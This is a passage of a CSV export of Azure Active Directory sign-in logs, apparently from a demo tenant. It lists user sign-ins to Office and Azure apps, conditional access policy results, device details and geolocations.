'4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ad09f59c-2ec1-4ebf-90ab-0f2590f61200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ad09f59c-2ec1-4ebf-90ab-0f2590f61200,SigninLogs,Sucess,36.6404686,-78.26995087
+1606,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3bb84064-9cdb-4308-92e6-aff7849eacd9,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",88cadf22-86a5-4f87-805f-6b2896271300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b2896271300,SigninLogs,Sucess,38.73078156,-78.17196655
+1607,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:42.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ab111081-64bd-48b5-9028-d4a13faefcc4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179ec0581200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,62115b57-0cb2-458e-8ba0-179ec0581200,SigninLogs,Sucess,33.7984581,-84.38828278
+1608,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:01.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f58d186e-75a7-4142-8b2b-404b579bab68,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0184cc6e-10a2-4578-80c3-44b6c15b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,0184cc6e-10a2-4578-80c3-44b6c15b1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1609,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:24.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 12:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8900d912-3d17-47c8-917b-3b43a76c1200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8900d912-3d17-47c8-917b-3b43a76c1200,SigninLogs,Sucess,50.6406517,5.572050095
+1610,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:00.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9696eea-32b2-450b-89e2-0713b36289a9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc87221200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,71d7ba06-8885-45d4-a319-08fc87221200,SigninLogs,Sucess,33.7984581,-84.38828278
+1611,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:03.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d85e088e-d42f-4079-8e77-4cabb6859f07,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",b3c0863d-787e-45d0-a1b5-da5491591200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da5491591200,SigninLogs,Sucess,38.73078156,-78.17196655
+1612,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",17d55b14-5a61-48e2-8a43-36855d6d6300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,17d55b14-5a61-48e2-8a43-36855d6d6300,SigninLogs,Sucess,35.01296997,-80.93171692
+1613,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,11d8993d-d314-42ae-a023-502a3e169f79,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c457a232-7a13-4abd-a93c-6f0a00a51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active 